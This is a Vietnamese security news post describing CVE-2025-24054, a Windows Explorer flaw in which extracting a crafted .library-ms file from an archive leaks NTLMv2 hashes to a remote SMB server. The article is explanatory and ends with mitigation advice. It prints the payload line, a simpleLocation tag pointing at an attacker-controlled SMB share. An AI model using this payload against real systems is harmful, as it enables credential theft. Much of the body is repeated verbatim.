-
09/04/2020
-
94
-
729 bài viết
Lỗ hổng Windows Explorer làm rò rỉ NTLM Hash (đã có PoC)
Một lỗ hổng bảo mật nghiêm trọng đã được phát hiện, cho phép rò rỉ mã băm NTLM khi trích xuất các tệp được tạo đặc biệt từ kho lưu trữ RAR/ZIP. Lỗ hổng này, ban đầu được định danh là CVE-2025-24071, nhưng sau đó Microsoft đã cập nhật mà CVE-2025-24071 thành CVE-2025-24054, với điểm CVSS là 7.5.
Lỗ hổng này nằm ở cách Windows Explorer xử lý các tệp ".library-ms" trong kho lưu trữ. Khi một tệp .library-ms được thiết kế đặc biệt có chứa đường dẫn SMB được nén trong kho lưu trữ RAR/ZIP và sau đó được giải nén, Windows Explorer sẽ tự động xử lý tệp này thông qua cơ chế lập chỉ mục và xem trước tích hợp, ngay cả khi người dùng không mở tệp.
Định dạng tệp “.library-ms”, dựa trên XML, được Windows Explorer tin cậy để xác định vị trí tìm kiếm và thư viện. Khi trích xuất, cơ chế phân tích tệp tích hợp của Windows Explorer và dịch vụ lập chỉ mục sẽ phân tích nội dung tệp.
Kẻ tấn công có thể tạo tệp .library-ms chứa thẻ <simpleLocation> trỏ đến máy chủ SMB do kẻ tấn công kiểm soát.
<simpleLocation>\\192.168.1.116\shared</simpleLocation>
Khi tệp này được giải nén, Windows Explorer ngay lập tức thực hiện yêu cầu SMB đến máy chủ từ xa mà không có cảnh báo nào. Điều này khiến hệ thống nạn nhân tự động gửi thông tin xác thực NTLMv2 cho kẻ tấn công mà không cần bất kỳ sự tương tác nào từ họ.
Sử dụng Procmon, các nhà nghiên cứu quan sát thấy Explorer.exe và các dịch vụ lập chỉ mục như SearchProtocolHost.exe tự động thực hiện các hoạt động như CreateFile, ReadFile, QueryBasicInformationFile và CloseFile ngay sau khi giải nén tệp .library-ms. SearchProtocolHost.exe được gọi như một phần của dịch vụ lập chỉ mục tệp của Windows, chứng minh thêm khả năng xử lý tệp tự động sau khi giải nén.
Wireshark ghi nhận các yêu cầu giao thức SMB2 (SMB2 Negotiate Protocol Requests, SMB2 Session Setup Requests), cho thấy hệ thống đã tự động khởi tạo quá trình xác thực NTLM ngay khi tệp được giải nén.
Lỗ hổng này đang bị khai thác thực tế (in the wild) và có thể đã được rao bán trên diễn đàn xss.is bởi một hacker có biệt danh "Krypton", cũng là người đứng sau phần mềm độc hại "EncryptHub Stealer".
Hiện đã có PoC (bằng chứng khai thác) trên GitHub và một module Metasploit được phát triển để khai thác lỗ hổng này.
Các chuyên gia khuyến cáo người dùng nên:
Lỗ hổng này nằm ở cách Windows Explorer xử lý các tệp ".library-ms" trong kho lưu trữ. Khi một tệp .library-ms được thiết kế đặc biệt có chứa đường dẫn SMB được nén trong kho lưu trữ RAR/ZIP và sau đó được giải nén, Windows Explorer sẽ tự động xử lý tệp này thông qua cơ chế lập chỉ mục và xem trước tích hợp, ngay cả khi người dùng không mở tệp.
Định dạng tệp “.library-ms”, dựa trên XML, được Windows Explorer tin cậy để xác định vị trí tìm kiếm và thư viện. Khi trích xuất, cơ chế phân tích tệp tích hợp của Windows Explorer và dịch vụ lập chỉ mục sẽ phân tích nội dung tệp.
Kẻ tấn công có thể tạo tệp .library-ms chứa thẻ <simpleLocation> trỏ đến máy chủ SMB do kẻ tấn công kiểm soát.
<simpleLocation>\\192.168.1.116\shared</simpleLocation>
Khi tệp này được giải nén, Windows Explorer ngay lập tức thực hiện yêu cầu SMB đến máy chủ từ xa mà không có cảnh báo nào. Điều này khiến hệ thống nạn nhân tự động gửi thông tin xác thực NTLMv2 cho kẻ tấn công mà không cần bất kỳ sự tương tác nào từ họ.
Sử dụng Procmon, các nhà nghiên cứu quan sát thấy Explorer.exe và các dịch vụ lập chỉ mục như SearchProtocolHost.exe tự động thực hiện các hoạt động như CreateFile, ReadFile, QueryBasicInformationFile và CloseFile ngay sau khi giải nén tệp .library-ms. SearchProtocolHost.exe được gọi như một phần của dịch vụ lập chỉ mục tệp của Windows, chứng minh thêm khả năng xử lý tệp tự động sau khi giải nén.
Wireshark ghi nhận các yêu cầu giao thức SMB2 (SMB2 Negotiate Protocol Requests, SMB2 Session Setup Requests), cho thấy hệ thống đã tự động khởi tạo quá trình xác thực NTLM ngay khi tệp được giải nén.
Lỗ hổng này đang bị khai thác thực tế (in the wild) và có thể đã được rao bán trên diễn đàn xss.is bởi một hacker có biệt danh "Krypton", cũng là người đứng sau phần mềm độc hại "EncryptHub Stealer".
Hiện đã có PoC (bằng chứng khai thác) trên GitHub và một module Metasploit được phát triển để khai thác lỗ hổng này.
Các chuyên gia khuyến cáo người dùng nên:
- Cập nhật ngay Windows để nhận bản vá từ Microsoft:
- Tắt tính năng tự động lập chỉ mục và xem trước tệp trong Windows Explorer.
- Chặn giao thức SMB từ các nguồn không đáng tin cậy để ngăn chặn việc rò rỉ mã băm NTLM.
- Sử dụng NTLM relay protection hoặc chuyển sang Kerberos để hạn chế nguy cơ khai thác.
Theo Security Online
Chỉnh sửa lần cuối: